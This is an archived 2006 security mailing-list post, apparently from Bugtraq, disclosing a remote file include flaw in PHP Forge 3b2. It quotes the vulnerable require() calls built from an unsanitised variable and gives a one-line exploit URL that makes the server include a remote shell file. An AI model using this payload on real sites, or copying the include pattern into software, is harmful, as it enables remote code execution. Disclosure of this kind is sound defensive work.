PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
- From: "mahmood ali" <mah_k_2000@xxxxxxxxxxx>
- Date: Sun, 15 Oct 2006 00:05:30 +0000
PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
############
Source Code:
http://www.comscripts.com/jump.php?action=script&id=697
############
Vulnerable Code:_
require($cfg_racine."inc/vars.php");
require($cfg_racine."inc/config.php");
require($cfg_racine."inc/fonctions.php");
require($cfg_racine."inc/systeme.php");
require($cfg_racine."inc/mysql.php");
require($cfg_racine."inc/membres.php");
############
Exploit :
http://www.test.com/[Php_Forge]//inc/inc.php?cfg_racine=shell.txt?
############
Discoverd By : Mahmood_ali
Conatact : mah_k_2000@xxxxxxxxxxx
############
Special Greetings :_ Tryag-Team
############
bugtraq@xxxxxxxxxxxxxxxxx
submit@xxxxxxxxxxx
_________________________________________________________________
The new Windows Live Toolbar helps you guard against viruses http://toolbar.live.com/?mkt=en-gb
- Prev by Date: Advisory 10/2006: ViewVC Undefined Charset UTF-7 XSS Vulnerability
- Next by Date: About.com contact
- Previous by thread: Advisory 10/2006: ViewVC Undefined Charset UTF-7 XSS Vulnerability
- Next by thread: About.com contact
- Index(es):
Relevant Pages
|
